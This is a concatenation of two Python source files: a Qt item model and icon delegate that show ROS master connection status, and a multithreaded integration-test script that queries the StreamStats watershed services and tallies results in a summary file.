            return self.name.lower() > item.name.lower()
        return False
class MasterSyncItem(QStandardItem):
    '''
    Model item that represents the sync state of one master. It delegates all
    state and comparisons to an internal MasterSyncButtonHelper, because a
    QStandardItem cannot emit signals itself.
    '''
    ITEM_TYPE = QStandardItem.UserType + 35

    def __init__(self, master):
        QStandardItem.__init__(self)
        self.name = master.name
        self.button = MasterSyncButtonHelper(master)
        self.parent_item = None

    @property
    def master(self):
        return self.button.master()

    def _get_sync_state(self):
        return self.button.get_sync_state()

    def _set_sync_state(self, value):
        self.button.set_sync_state(value)

    # Exposed as a property so callers can read/assign the sync state directly.
    synchronized = property(_get_sync_state, _set_sync_state)

    def __eq__(self, other):
        return self.button == other

    def __gt__(self, other):
        return self.button > other
class MasterItem(QStandardItem):
    '''
    The master item stored in the master model. This class stores the master as
    fkie_master_discovery.ROSMaster.
    '''
    ITEM_TYPE = QStandardItem.UserType + 34

    def __init__(self, master, local=False, quality=None, parent=None):
        # Local masters get a " (localhost)" suffix so users can spot them.
        self.name = ''.join([master.name, ' (localhost)']) if local else master.name
        QStandardItem.__init__(self, '')  # self.name)
        self.parent_item = None
        self._master = master
        self.local = local
        self.__quality = quality
        self.descr = ''
        self.ICONS = {'green': nm.settings().icon('stock_connect_green.png'),
                      'yellow': nm.settings().icon('stock_connect_yellow.png'),
                      'red': nm.settings().icon('stock_connect_red.png'),
                      'grey': nm.settings().icon('stock_connect.png'),
                      'disconnected': nm.settings().icon('stock_disconnect.png'),
                      'warning': nm.settings().icon('crystal_clear_warning.png'),
                      'clock_warn': nm.settings().icon('crystal_clear_xclock_fail.png')}
        # None until the background DNS lookup succeeds; a None value is
        # treated as "host not reachable" by updateNameView.
        self.master_ip = None
        self._master_errors = []
        self._diagnostics = []
        self._timediff = 0
        # Resolve the master's IP in the background so the UI thread is not
        # blocked by a potentially slow DNS lookup.
        self._threaded_get_ip()
        self.updateNameView(master, quality, self)

    def _threaded_get_ip(self):
        # Fire-and-forget daemon thread; the result lands in self.master_ip.
        thread = threading.Thread(target=self.__get_ip)
        thread.daemon = True
        thread.start()

    def __get_ip(self):
        try:
            # get the IP of the master uri
            result = getaddrinfo(get_hostname(self.master.uri), None)
            ips = []
            for r in result:
                # getaddrinfo sockaddr is a 4-tuple for IPv6, 2-tuple for IPv4
                if r[0] == AF_INET6:
                    (_family, _socktype, _proto, _canonname, (ip, _port, _flow, _scope)) = r
                else:
                    (_family, _socktype, _proto, _canonname, (ip, _port)) = r
                if self.master_ip is None and ip:
                    self.master_ip = ''
                if ip and ip not in ips:
                    # NOTE(review): the first join produces a leading space in
                    # master_ip (joins '' with ip); harmless for display but
                    # confirm before relying on the exact string.
                    self.master_ip = ' '.join([self.master_ip, ip])
                    ips.append(ip)
            # self.updateNameView(self.master, self.quality, self)
        except Exception:
            import traceback
            print(traceback.format_exc(1))

    @property
    def master(self):
        return self._master

    @master.setter
    def master(self, value):
        self._master = value

    @property
    def quality(self):
        return self.__quality

    @quality.setter
    def quality(self, value):
        # Changing the quality re-renders the row (icon + tooltip).
        if self.__quality != value:
            self.__quality = value
            self.updateMasterView(self.parent_item)

    @property
    def diagnostics(self):
        # copy, so callers cannot mutate the internal list
        return list(self._diagnostics)

    @property
    def master_errors(self):
        # copy, so callers cannot mutate the internal list
        return list(self._master_errors)

    def updateMasterErrors(self, error_list):
        # Replace the whole error list reported by master_discovery.
        self._master_errors = error_list
        self.updateNameView(self.master, self.quality, self)

    def add_master_error(self, msg):
        # Append a single error message, avoiding duplicates.
        if msg not in self._master_errors:
            self._master_errors.append(msg)
            self.updateNameView(self.master, self.quality, self)

    def update_master_diagnostics(self, diagnostics):
        # Keep only non-OK diagnostics whose hardware_id matches this master.
        del self._diagnostics[:]
        for diagnostic in diagnostics.status:
            if diagnostic.level > 0 and diagnostic.hardware_id == self._master.name:
                self._diagnostics.append(diagnostic)
        self.updateNameView(self.master, self.quality, self)

    def updateTimeDiff(self, timediff):
        # Time difference (seconds) between local host and the master's host.
        self._timediff = timediff
        self.updateNameView(self.master, self.quality, self)

    def updateMasterView(self, parent):
        '''
        This method is called after the master state is changed to update the
        representation of the master. The name will not be changed, but all other
        data.
        @param parent: Item which contains this master item. This is needed to update
        other columns of this master.
        @type parent: U{QtGui.QStandardItem<https://srinikom.github.io/pyside-docs/PySide/QtGui/QStandardItem.html>}
        '''
        if parent is not None:
            # update the name decoration
            child = parent.child(self.row(), MasterModel.COL_NAME)
            if child is not None:
                self.updateNameView(self.master, self.quality, child)

    def updateNameView(self, master, quality, item):
        '''
        Updates the representation of the column contains the name state.
        @param master: the master data
        @type master: fkie_master_discovery.ROSMaster
        @param quality: connection quality in percent; C{None} or -1. if unknown
        @param item: corresponding item in the model whose icon/tooltip is updated
        @type item: L{MasterItem}
        '''
        # Build the rich-text tooltip incrementally.
        tooltip = ''.join(['<html><body>'])
        tooltip = ''.join([tooltip, '<h4>', master.uri, '</h4>'])
        tooltip = ''.join([tooltip, '<dl>'])
        tooltip = ''.join([tooltip, '<dt>', 'IP: ', str(self.master_ip), '</dt>'])
        if master.online:
            if quality is not None and quality != -1.:
                tooltip = ''.join([tooltip, '<dt>', 'Quality: ', str(quality), ' %', '</dt>'])
            else:
                tooltip = ''.join([tooltip, '<dt>', 'Quality: not available, start <b>master_discovery</b> with <b>heartbeat_hz</b> parameter >= %.02f</dt>' % DiscoveredMaster.MIN_HZ_FOR_QUALILTY])
        else:
            tooltip = ''.join([tooltip, '<dt>', 'offline', '</dt>'])
        tooltip = ''.join([tooltip, '</dl>'])
        if item.descr:
            tooltip = ''.join([tooltip, item.descr])
        # update the icon: warnings take precedence over quality coloring
        if master.online:
            timediff = abs(self._timediff) > nm.settings().max_timediff
            if self._master_errors or self._diagnostics or self.master_ip is None or timediff:
                item.setIcon(self.ICONS['warning'])
                if timediff:
                    tooltip = ''.join([tooltip, '<h4>', '<font color="#CC0000">Time difference to the host is about %.3f seconds!</font>' % self._timediff, '</h4>'])
                    item.setIcon(self.ICONS['clock_warn'])
                if self.master_ip is None:
                    tooltip = ''.join([tooltip, '<h4>', '<font color="#CC0000">Host not reachable by name!!! The ROS topics may not by connected!!!</font>', '</h4>'])
                if self._master_errors:
                    tooltip = ''.join([tooltip, '<h4>Errors reported by master_discovery:</h4>'])
                    for err in self._master_errors:
                        tooltip = ''.join([tooltip, '<dt><font color="#CC0000">%s</font></dt>' % err])
                for diag in self._diagnostics:
                    tooltip = ''.join([tooltip, '<dt><font color="#CC0000">%s</font></dt>' % diag.message])
            elif quality is not None and quality != -1.:
                # No warnings: color the connection icon by quality thresholds.
                if quality > 30:
                    item.setIcon(self.ICONS['green'])
                elif quality > 5:
                    item.setIcon(self.ICONS['yellow'])
                else:
                    item.setIcon(self.ICONS['red'])
            else:
                item.setIcon(self.ICONS['grey'])
        else:
            item.setIcon(self.ICONS['disconnected'])
        tooltip = ''.join([tooltip, '</body></html>'])
        item.setToolTip(tooltip)

    def update_description(self, descr):
        # descr is HTML appended to the tooltip (see updateNameView).
        self.descr = descr
        self.updateNameView(self.master, self.quality, self)

    @classmethod
    def toHTML(cls, text):
        '''
        @param text: the text
        @type text: C{str}
        @return: the HTML representation of the name of the text
        @rtype: C{str}
        '''
        # Gray out the namespace part, bold the base name.
        ns, sep, name = text.rpartition('/')
        result = ''
        if sep:
            result = ''.join(['<html><body>', '<span style="color:gray;">', str(ns), sep, '</span><b>', name, '</b></body></html>'])
        else:
            result = name
        return result

    def type(self):
        return MasterItem.ITEM_TYPE

    def __eq__(self, item):
        # Case-insensitive comparison by master name; item may be a string
        # or another object with a .master.name (master is a @property here).
        if isstring(item):
            return self.master.name.lower() == item.lower()
        elif not (item is None):
            return self.master.name.lower() == item.master.name.lower()
        return False

    def __gt__(self, item):
        # Ordering by master name; local masters always sort to the top.
        if isstring(item):
            local = False
            try:
                local = nm.is_local(item)
            except Exception:
                pass
            if self.local and not local:  # local hosts are at the top
                return False
            return self.master.name.lower() > item.lower()
        elif not (item is None):
            if self.local and not item.local:  # local hosts are at the top
                return False
            return self.master.name.lower() > item.master.name.lower()
        return False
class MasterModel(QStandardItemModel):
    '''
    The model to manage the list with masters in ROS network.
    '''
    sync_start = Signal(str)
    sync_stop = Signal(str)
    header = [('Sync', 28), ('Name', -1)]
    '''@ivar: the list with columns C{[(name, width), ...]}'''
    COL_SYNC = 0
    COL_NAME = 1
    COL_SYNCBTN = 2

    def __init__(self, local_masteruri=None):
        '''
        Creates a new list model.
        '''
        QStandardItemModel.__init__(self)
        self.setColumnCount(len(MasterModel.header))
        self._masteruri = local_masteruri
        self.parent_view = None
        # workaround for using with PyQt: store the python objects to keep the
        # attributes defined on the MasterItem subclasses alive
        self.pyqt_workaround = dict()

    def flags(self, index):
        '''
        @param index: parent of the list
        @type index: U{QtCore.QModelIndex<https://srinikom.github.io/pyside-docs/PySide/QtCore/QModelIndex.html>}
        @return: Flag of the requested item
        @rtype: U{QtCore.Qt.ItemFlag<https://srinikom.github.io/pyside-docs/PySide/QtCore/Qt.html>}
        @see: U{http://www.pyside.org/docs/pyside-1.0.1/PySide/QtCore/Qt.html}
        '''
        if not index.isValid():
            return Qt.NoItemFlags
        # item = self.itemFromIndex(index)
        # if item and item.master.online:
        return Qt.ItemIsSelectable | Qt.ItemIsEnabled
        # return Qt.NoItemFlags

    def updateMaster(self, master):
        '''
        Updates the information of the ros master. If the ROS master not exists, it
        will be added.
        @param master: the ROS master to update
        @type master: U{fkie_master_discovery.msg.ROSMaster<http://docs.ros.org/api/fkie_multimaster_msgs/html/msg/ROSMaster.html>}
        '''
        # remove master, if his name was changed but not the ROS master URI
        root = self.invisibleRootItem()
        for i in reversed(range(root.rowCount())):
            masterItem = root.child(i)
            if masterItem.master.uri == master.uri and masterItem.master.name != master.name:
                root.removeRow(i)
                try:
                    del self.pyqt_workaround[masterItem.master.name]
                except Exception:
                    pass
                break
        # update or add the item; rows are kept sorted by master name
        root = self.invisibleRootItem()
        doAddItem = True
        is_local = nm.is_local(get_hostname(master.uri))
        for index in range(root.rowCount()):
            masterItem = root.child(index, self.COL_NAME)
            if (masterItem == master.name):
                # update item (MasterItem.__eq__ compares against the string)
                masterItem.master = master
                masterItem.updateMasterView(root)
                doAddItem = False
                break
            elif (masterItem > master.name):
                # passed the sorted position: insert the new master here
                self.addRow(master, is_local, root, index)
                doAddItem = False
                break
        if doAddItem:
            self.addRow(master, is_local, root, -1)

    def addRow(self, master, local, root, index):
        '''
        Creates the list of the items from master. This list is used for the
        visualization of master data as a table row.
        @param master: the master data
        @type master: fkie_master_discovery.ROSMaster
        @param local: whether the master is local or not
        @type local: bool
        @param index: row position to insert at, or -1 to append
        @return: the list for the representation as a row
        @rtype: C{[L{MasterItem} or U{QtGui.QStandardItem<https://srinikom.github.io/pyside-docs/PySide/QtGui/QStandardItem.html>}, ...]}
        '''
        items = []
        sync_item = MasterSyncItem(master)
        items.append(sync_item)
        name_item = MasterItem(master, local)
        items.append(name_item)
        name_item.parent_item = root
        # workaround for using with PyQt: keep a python-side reference so the
        # attributes of the MasterItem subclasses are not garbage collected
        self.pyqt_workaround[master.name] = items
        # add the items to the data model
        if index > -1:
            root.insertRow(index, items)
        else:
            root.appendRow(items)
        # add the sync button and connect the signals
        if self.parent_view is not None:
            newindex = index if index > -1 else root.rowCount() - 1
            self.parent_view.setIndexWidget(self.index(newindex, self.COL_SYNC), sync_item.button.widget)
            sync_item.button.clicked.connect(self.on_sync_clicked)
        return items

    def updateMasterStat(self, master, quality):
        '''
        Updates the information of the ros master.
        @param master: the ROS master to update
        @type master: C{str}
        @param quality: the quality of the connection to master
        @type quality: C{float}
        '''
        root = self.invisibleRootItem()
        for i in reversed(range(root.rowCount())):
            masterItem = root.child(i, self.COL_NAME)
            # NOTE: deliberate substring match ('in'), since the given name
            # may carry decorations around the stored master name.
            if masterItem.master.name in master:
                masterItem.quality = quality
                break

    def setChecked(self, master, state):
        '''
        Set the master to checked state
        @param master: the ROS master to update
        @type master: C{str}
        @param state: new state
        @type state: C{bool}
        '''
        root = self.invisibleRootItem()
        for i in reversed(range(root.rowCount())):
            masterItem = root.child(i, self.COL_SYNC)
            if masterItem.master.name == master:
                masterItem.synchronized = MasterSyncButtonHelper.SYNC if state else MasterSyncButtonHelper.NOT_SYNC
                break

    def removeMaster(self, master):
        '''
        Remove the master with given name.
        @param master: the ROS master to remove
        @type master: C{str}
        '''
        root = self.invisibleRootItem()
        for i in reversed(range(root.rowCount())):
            masterItem = root.child(i, self.COL_NAME)
            if masterItem.master.name == master:
                root.removeRow(i)
                # Bug fix: the original deleted 'pyqt_workaround_sync' and
                # 'pyqt_workaround_info', attributes that are never defined on
                # this class; the AttributeError was silently swallowed and the
                # keep-alive entry in 'pyqt_workaround' leaked forever.
                self.pyqt_workaround.pop(masterItem.master.name, None)
                break

    def updateMasterErrors(self, master, errors):
        '''
        Updates the errors reported by master_discovery.
        @param master: the ROS master to update
        @type master: C{str}
        @param errors: the list with errors
        @type errors: C{[str]}
        '''
        root = self.invisibleRootItem()
        for i in reversed(range(root.rowCount())):
            masterItem = root.child(i, self.COL_NAME)
            if masterItem.master.name == master:
                masterItem.updateMasterErrors(errors)
                break

    def add_master_error(self, master, msg):
        '''
        Add error to the error list.
        :param str master: the ROS master to update
        :param str msg: error message
        '''
        root = self.invisibleRootItem()
        for i in reversed(range(root.rowCount())):
            masterItem = root.child(i, self.COL_NAME)
            if masterItem.master.name == master:
                masterItem.add_master_error(msg)
                break

    def update_master_diagnostic(self, master_name, diagnostics):
        # Forward a diagnostics message to the matching master item.
        root = self.invisibleRootItem()
        for i in reversed(range(root.rowCount())):
            masterItem = root.child(i, self.COL_NAME)
            if masterItem.master.name == master_name:
                masterItem.update_master_diagnostics(diagnostics)
                break

    def updateTimeDiff(self, master, timediff):
        '''
        Updates the time difference reported by master_discovery.
        @param master: the ROS master to update
        @type master: C{str}
        @param timediff: the time difference to the host
        @type timediff: float
        '''
        root = self.invisibleRootItem()
        for i in reversed(range(root.rowCount())):
            masterItem = root.child(i, self.COL_NAME)
            if masterItem.master.name == master:
                masterItem.updateTimeDiff(timediff)
                break

    def update_description(self, master, descr):
        '''
        Updates the description of the master with given name.
        @param master: the ROS master to update
        @type master: C{str}
        @param descr: the description of the master coded as HTML
        @type descr: C{str}
        '''
        root = self.invisibleRootItem()
        for i in range(root.rowCount()):
            masterItem = root.child(i, self.COL_NAME)
            if masterItem and masterItem.master.name == master:
                masterItem.update_description(descr)

    def on_sync_clicked(self, checked, masteruri):
        # Re-emit the button click as a start/stop synchronization request.
        if checked:
            self.sync_start.emit(masteruri)
        else:
            self.sync_stop.emit(masteruri)
class MasterIconsDelegate(QItemDelegate):
    '''
    Delegate painting the master name column: status/warning icons followed by
    the host name, and rebuilding the item tooltip from the current state.
    '''

    def __init__(self, parent=None, *args):
        QItemDelegate.__init__(self, parent, *args)
        self._idx_icon = 1      # running x-offset of the next icon in the row
        self._hspacing = 2
        self._vspacing = 4
        self._icon_size = 0     # icons are (re)scaled lazily in paint()
        self._enabled = True
        self.IMAGES = {}

    def _scale_icons(self, icon_size):
        # Rescale all status images to the current row height.
        self._icon_size = icon_size
        params = (self._icon_size, self._icon_size, Qt.IgnoreAspectRatio, Qt.SmoothTransformation)
        self.IMAGES = {'green': nm.settings().image('stock_connect_green.png').scaled(*params),
                       'yellow': nm.settings().image('stock_connect_yellow.png').scaled(*params),
                       'red': nm.settings().image('stock_connect_red.png').scaled(*params),
                       'grey': nm.settings().image('stock_connect.png').scaled(*params),
                       'disconnected': nm.settings().image('stock_disconnect.png').scaled(*params),
                       'warning': nm.settings().image('crystal_clear_warning.png').scaled(*params),
                       'clock_warn': nm.settings().image('crystal_clear_xclock_fail.png').scaled(*params),
                       'cpu_warn': nm.settings().image('hight_load.png').scaled(*params),
                       'cpu_temp_warn': nm.settings().image('temperatur_warn.png').scaled(*params),
                       'hdd_warn': nm.settings().image('crystal_clear_hdd_warn.png').scaled(*params),
                       'net_warn': nm.settings().image('sekkyumu_net_warn.png').scaled(*params),
                       'mem_warn': nm.settings().image('mem_warn.png').scaled(*params)
                       }

    def set_enabled(self, value):
        # When disabled, quality icons are suppressed (warnings still shown).
        self._enabled = value

    def paint(self, painter, option, index):
        # update the icon size and resize images if needed
        if option.rect.height() - self._vspacing * 2 != self._icon_size:
            self._icon_size = option.rect.height() - self._vspacing * 2
            self._scale_icons(self._icon_size)
        painter.save()
        self._idx_icon = 1
        item = index.model().itemFromIndex(index)
        if option.state & QStyle.State_Selected:
            painter.fillRect(option.rect, option.palette.highlight())
        if isinstance(item, MasterItem):
            # NOTE(review): the tooltip is (re)built inside paint(); cheap
            # enough here, but confirm before moving heavy work into it.
            tooltip = '<html><body>'
            tooltip = '%s\n<h4>%s</h4>' % (tooltip, item.master.uri)
            tooltip = '%s\n<dt>IP: %s</dt>' % (tooltip, str(item.master_ip))
            if item.master.online:
                if item.quality is not None and item.quality != -1.:
                    tooltip = '%s\n<dt>Quality: %.2f </dt>' % (tooltip, item.quality)
                else:
                    tooltip = '%s\n<dt>Quality: not available, start <b>master_discovery</b> with <b>heartbeat_hz</b> parameter >= %.02f</dt>' % (tooltip, DiscoveredMaster.MIN_HZ_FOR_QUALILTY)
            else:
                tooltip = '%s\n<dt>offline</dt>' % (tooltip)
            # update warnings
            if item.master.online:
                master_errors = item.master_errors
                if master_errors or item.master_ip is None:
                    rect = self.calcDecorationRect(option.rect)
                    painter.drawImage(rect, self.IMAGES['warning'])
                    if item.master_ip is None:
                        tooltip = '%s\n<h4><font color="#CC0000">Host not reachable by name! The ROS topics may not by connected!</font></h4>' % (tooltip)
                    if master_errors:
                        tooltip = '%s\n<h4>Errors reported by master_discovery:</h4>' % (tooltip)
                        for err in master_errors:
                            tooltip = '%s\n<dt><font color="#CC0000">%s</font></dt>' % (tooltip, err)
                elif self._enabled:
                    rect = self.calcDecorationRect(option.rect)
                    if item.quality is not None and item.quality != -1.:
                        if item.quality > 30:
                            painter.drawImage(rect, self.IMAGES['green'])
                        elif item.quality > 5:
                            painter.drawImage(rect, self.IMAGES['yellow'])
                        else:
                            painter.drawImage(rect, self.IMAGES['red'])
                    else:
                        painter.drawImage(rect, self.IMAGES['grey'])
                # check for time difference
                timediff = abs(item._timediff) > nm.settings().max_timediff
                if timediff:
                    tooltip = '%s\n<h4><font color="#CC0000">Time difference to the host is about %.3f seconds!</font></h4>' % (tooltip, item._timediff)
                    rect = self.calcDecorationRect(option.rect)
                    painter.drawImage(rect, self.IMAGES['clock_warn'])
            else:
                rect = self.calcDecorationRect(option.rect)
                painter.drawImage(rect, self.IMAGES['disconnected'])
            # update diagnostic warnings
            for diag in item.diagnostics:
                if diag.level > 0:
                    # Bug fix: the original chained no-op replaces
                    # (replace('>', '>')...); escape angle brackets so the
                    # diagnostic text cannot break the rich-text tooltip.
                    tooltip = '%s\n<dt><font color="#CC0000">%s</font></dt>' % (tooltip, diag.message.replace('<', '&lt;').replace('>', '&gt;'))
                    if 'Network Load' in diag.name:
                        rect = self.calcDecorationRect(option.rect)
                        painter.drawImage(rect, self.IMAGES['net_warn'])
                    if 'CPU Load' in diag.name:
                        rect = self.calcDecorationRect(option.rect)
                        painter.drawImage(rect, self.IMAGES['cpu_warn'])
                    if 'CPU Temperature' in diag.name:
                        rect = self.calcDecorationRect(option.rect)
                        painter.drawImage(rect, self.IMAGES['cpu_temp_warn'])
                    if 'Memory Usage' in diag.name:
                        rect = self.calcDecorationRect(option.rect)
                        painter.drawImage(rect, self.IMAGES['mem_warn'])
                    if 'HDD Usage' in diag.name:
                        rect = self.calcDecorationRect(option.rect)
                        painter.drawImage(rect, self.IMAGES['hdd_warn'])
            # update description from robot description parameter
            if item.descr:
                tooltip = '%s\n%s' % (tooltip, item.descr)
            # paint the name of the host
            tooltip = '%s\n</body></html>' % (tooltip)
            item.setToolTip(tooltip)
            rect = self.calcDecorationRect(option.rect, image=False)
            painter.drawText(rect, Qt.AlignVCenter, item.name)
        painter.restore()

    def calcDecorationRect(self, main_rect, image=True):
        # Advance the x-cursor and return the rect for the next icon (or the
        # remaining width for the text when image=False).
        rect = QRect()
        rect.setX(main_rect.x() + self._idx_icon + self._hspacing)
        rect.setY(main_rect.y() + self._vspacing)
        rect.setWidth(self._icon_size if image else main_rect.width() - self._idx_icon)
        rect.setHeight(self._icon_size)
        self._idx_icon += self._icon_size + self._hspacing
        return rect
|
IntegrationWrapperV2.py | #Integration testing for watershed deliniation
import traceback
import datetime
import time
import os
import argparse
import fnmatch
import json
import threading
from WIMLib.WiMLogging import WiMLogging
from WIMLib import Shared
from WIMLib.Config import Config
from ServiceAgents.StreamStatsServiceAgent import StreamStatsServiceAgent
from threading import Thread
import random
import queue
#Initial number of thread calls will be (N+1)
simulThreads = 0
queue_list = queue.Queue()
#Open config file and define workspace
config = json.load(open(os.path.join(os.path.dirname(__file__), 'config.json')))
Config (config)
workingDir = Shared.GetWorkspaceDirectory (config["workingdirectory"]) #initialize and create logging folder w file
#Create Summary.txt in the root folder of streamstats (Need to change directory)
# NOTE: counterOverwrite() matches the second whitespace-separated token of
# each 'Total <name> runs: <N>' line, so the <name> keys below are a contract.
# NOTE(review): run_func() increments 'flowstatfail', which has no matching
# line here — confirm whether 'flowstatsfail' was intended.
sumPath = os.path.join (workingDir, 'Summary.txt')
fSummary = open (sumPath, 'w+')
fSummary.write ( 'Starting Summary'+ '\n')
fSummary.write ( 'Total all runs: 0'+ '\n')
fSummary.write ( 'Total bchar runs: 0'+ '\n')
fSummary.write ( 'Total bdel runs: 0'+ '\n')
fSummary.write ( 'Total flowstats runs: 0'+ '\n')
fSummary.write ( 'Total bcharNoteq runs: 0'+ '\n')
fSummary.write ( 'Total bdelNoteq runs: 0'+ '\n')
fSummary.write ( 'Total flowstatsNoteq runs: 0'+ '\n')
fSummary.write ( 'Total bcharfail runs: 0'+ '\n')
fSummary.write ( 'Total bdelfail runs: 0'+ '\n')
fSummary.write ( 'Total flowstatsfail runs: 0'+ '\n')
fSummary.write ( 'Total bcharNew runs: 0'+ '\n')
fSummary.write ( 'Total bdelNew runs: 0'+ '\n')
fSummary.write ( 'Total flowstatsNew runs: 0'+ '\n')
fSummary.write ( 'Total bcharrep runs: 0'+ '\n')
fSummary.write ( 'Total flowstatsrep runs: 0'+ '\n')
fSummary.close ()
WiMLogging (workingDir)
#Used for command line
parser = argparse.ArgumentParser()
parser.add_argument ("-file", help="specifies csv file location including gage lat/long and comid's to estimate", type=str, #Use the following LAT/LON pour point
                     default = config["referenceCoordinates"]) #Change to the location of the csv file
# NOTE(review): the default is the string '4326' although type=int — argparse
# applies 'type' only to command-line values; confirm intended.
parser.add_argument ("-inputEPSG_Code", help="Default WGS 84 (4326),see http://spatialreference.org/ref/epsg/ ", type=int,
                     default = '4326')
args = parser.parse_args()
#Check if file (Input.csv) is in csv
print(args.file)
if not os.path.isfile(args.file): raise Exception ("File does not exist")
# Reference result folders per service, validated to exist up front.
refDir = {"bdel": StreamStatsServiceAgent.CheckDirectoryExists(config["referenceFolderBasinDel"]),"bchar":StreamStatsServiceAgent.CheckDirectoryExists(config["referenceFolderBasinChar"]), "flowstats":StreamStatsServiceAgent.CheckDirectoryExists(config["referenceFolderFlowStats"])}
file = Shared.readCSVFile(args.file)
#file = Shared.readURL (url)
# Column indices fall back to fixed positions when headers are missing.
headers = file[0]
rcode = headers.index("State") if "State" in headers else 0
x = headers.index("dec_long") if "dec_long" in headers else 1
y = headers.index("dec_lat") if "dec_lat" in headers else 2
uniqueID = headers.index("GageID") if "GageID" in headers else 3
file.pop(0)
#Start logging txt
startTime = time.time()
WiMLogging().sm ("Starting routine")
#Count total number of rows, and initiate equal number of threads
row_count = sum(1 for row in file) #Total number of sites
maxThreads = row_count #Equal to the number of sites
def timing(f):
    """Decorator: log the wall-clock duration of each call to *f*.

    Improvement: the original wrapper only forwarded positional arguments;
    keyword arguments are now passed through as well (backward compatible,
    existing positional-only callers are unaffected).
    """
    def wrap(*args, **kwargs):
        time1 = time.time()
        ret = f(*args, **kwargs)
        time2 = time.time()
        # logged to the WiM log file, same format as before
        WiMLogging().sm ('{:s} function took {:.3f} s'.format(f.__name__, (time2-time1)))
        return ret
    return wrap
def findStr (x,y):
    """Count how many elements of *x* contain the substring *y*.

    Elements and the needle are coerced to ``str`` first.

    Bug fix: the original tested ``str.find(...) > 0``, which silently
    skipped matches located at index 0 (a hit at the very start of the
    string); containment is what the surrounding comments describe.
    """
    needle = str(y)
    return sum(1 for item in x if needle in str(item))
#Main function that run by a thread
def run(i, q):
    """Thread target: take one site tuple off *q*, process it, and always
    bump the 'all' counter and mark the queue task done."""
    rcode, x, y, refdir, iden, workspace = q.get()
    try:
        # main worker: fetch data from the server and compare to references
        run_func(rcode, x, y, refdir, iden, workspace)
    except:
        WiMLogging().sm("Error w/ run " + traceback.format_exc())
    finally:
        counterOverwrite(sumPath, 'all')
        q.task_done()
#Background function run for each site
def run_func(rcode, x, y,
             path, siteIdentifier, workingDir):
    """Query basin delineation, basin characteristics and flow statistics for
    one site and compare each response against the reference files.

    Fixes over the original:
      * the recursive retry helpers now *return* the recursive call's value —
        previously a successful retry computed a result and returned None;
      * ``resultFlowStats`` is initialized, so a partial failure no longer
        raises NameError in the reporting section;
      * the flow-stats failure counter uses 'flowstatsfail', the key actually
        written to Summary.txt ('flowstatfail' never matched any line);
      * bare ``except:`` clauses narrowed to ``except Exception:``.
    """
    response = None
    resultBChar = None
    resultBDel = None
    resultFlowStats = None
    bcharServer = None
    flowStatsServer = None
    flowStatsResponse = None
    with StreamStatsServiceAgent() as sa:
        try:
            # Recursive basin-delineation call: at most 5 attempts, 1 s apart.
            @timing
            def rcBDel(f=0):
                try:
                    if (f > 4):
                        return None
                    response = sa.getBasin(rcode, x, y, 4326)
                    # Probe the geometry so malformed returns trigger a retry.
                    len(response[0]['featurecollection'][1]['feature']['features'][0]['geometry']['coordinates'][0])
                    return (response)
                except Exception:
                    WiMLogging().sm('Attempting rcBDel')
                    time.sleep(1)
                    return rcBDel(f + 1)

            # Recursive basin-characteristics call: at most 5 attempts; a
            # failed attempt re-delineates the basin (last two tries only).
            @timing
            def rcBChar(rcode, response, j=0):
                try:
                    if (j > 4):
                        return None
                    return sa.getBChar(rcode, response['workspaceID'])
                except Exception:
                    WiMLogging().sm('Attempting rcBChar')
                    response = rcBDel(3)
                    return rcBChar(rcode, response[0], j + 1)

            # Recursive flow-statistics call, same retry scheme as rcBChar.
            @timing
            def rcFlowStats(rcode, response, j=0):
                try:
                    if (j > 4):
                        return None
                    return sa.getFlowStats(rcode, response['workspaceID'])
                except Exception:
                    WiMLogging().sm('Attempting rcFlowStats')
                    response = rcBDel(3)
                    return rcFlowStats(rcode, response[0], j + 1)

            # Basin delineation first; everything else needs its workspaceID.
            response = rcBDel()
            resultBDel = response[0]['featurecollection'][1]['feature']['features'][0]['geometry']['coordinates'][0]  # List of lists
            HUCID = response[0]['featurecollection'][1]['feature']['features'][0]['properties']['HUCID']
            xy = [x, y]
            bdelServer = response[1]['usgswim-hostname']
            resultBChar = rcBChar(rcode, response[0], 0)
            bcharServer = resultBChar[1]['usgswim-hostname']
            flowStatsResponse = rcFlowStats(rcode, response[0], 0)
            resultFlowStats = flowStatsResponse[0]
            flowStatsServer = flowStatsResponse[1]['usgswim-hostname']
        except Exception:
            # A missing delineation invalidates everything downstream.
            if response is None:
                resultBDel = None
                resultBChar = None
                resultFlowStats = None
    # Report/compare each of the three results independently.
    if resultBDel is None:
        fSummary = open(sumPath, 'a')
        fSummary.write(rcode + ', ' + str(siteIdentifier) + ':' + ' Missing Return for BDel' + '\n')
        counterOverwrite(sumPath, 'bdelfail')
        fSummary.close()
        print("Finished: ", siteIdentifier)
        WiMLogging().sm("{0} Failed to return from service BDel".format(siteIdentifier))
    else:
        compare(resultBDel, path.get("bdel"), siteIdentifier,
                workingDir, HUCID, xy, rcode, bdelServer)
        if bcharServer is None or resultBChar is None:
            fSummary = open(sumPath, 'a')
            fSummary.write(rcode + ', ' + str(siteIdentifier) + ':' + ' Missing Return for BChar' + '\n')
            counterOverwrite(sumPath, 'bcharfail')
            fSummary.close()
            print("Finished with error: ", siteIdentifier)
            WiMLogging().sm("{0} Failed to return from service Bchar".format(siteIdentifier))
        else:
            compare(resultBChar, path.get("bchar"), siteIdentifier,
                    workingDir, HUCID, xy, rcode, bcharServer)
        if flowStatsServer is None or resultFlowStats is None:
            fSummary = open(sumPath, 'a')
            fSummary.write(rcode + ', ' + str(siteIdentifier) + ':' + ' Missing Return for FlowStats' + '\n')
            # fixed key: Summary.txt contains 'flowstatsfail', not 'flowstatfail'
            counterOverwrite(sumPath, 'flowstatsfail')
            fSummary.close()
            print("Finished with error: ", siteIdentifier)
            WiMLogging().sm("{0} Failed to return from service FlowStats".format(siteIdentifier))
        else:
            ##TODO: getting issues with dumping the json in the files, it's stopping at the comma...
            compare(resultFlowStats, path.get("flowstats"), siteIdentifier,
                    workingDir, HUCID, xy, rcode, flowStatsServer)
        print("Finished: ", siteIdentifier)
def writeToJSONFile (path, fileName, data):
    """Serialize *data* as JSON to ``<path>/<fileName>.json``.

    Errors are logged instead of raised (best-effort, matching the original
    contract), but only ``Exception`` is caught now so that SystemExit and
    KeyboardInterrupt propagate.
    Based on https://gist.github.com/keithweaver/ae3c96086d1c439a49896094b5a59ed0
    """
    try:
        filePathNameWExt = os.path.join(path, fileName + ".json")
        with open(filePathNameWExt, "w+") as fp:
            json.dump(data, fp)
    except Exception:
        WiMLogging().sm("Error writing json output " + traceback.format_exc())
def counterOverwrite (input_txt, param_string):
    """Increment the ``Total <param_string> runs: <N>`` counter line in the
    summary file *input_txt*, rewriting the file in place.

    Lines are expected as four whitespace-separated tokens:
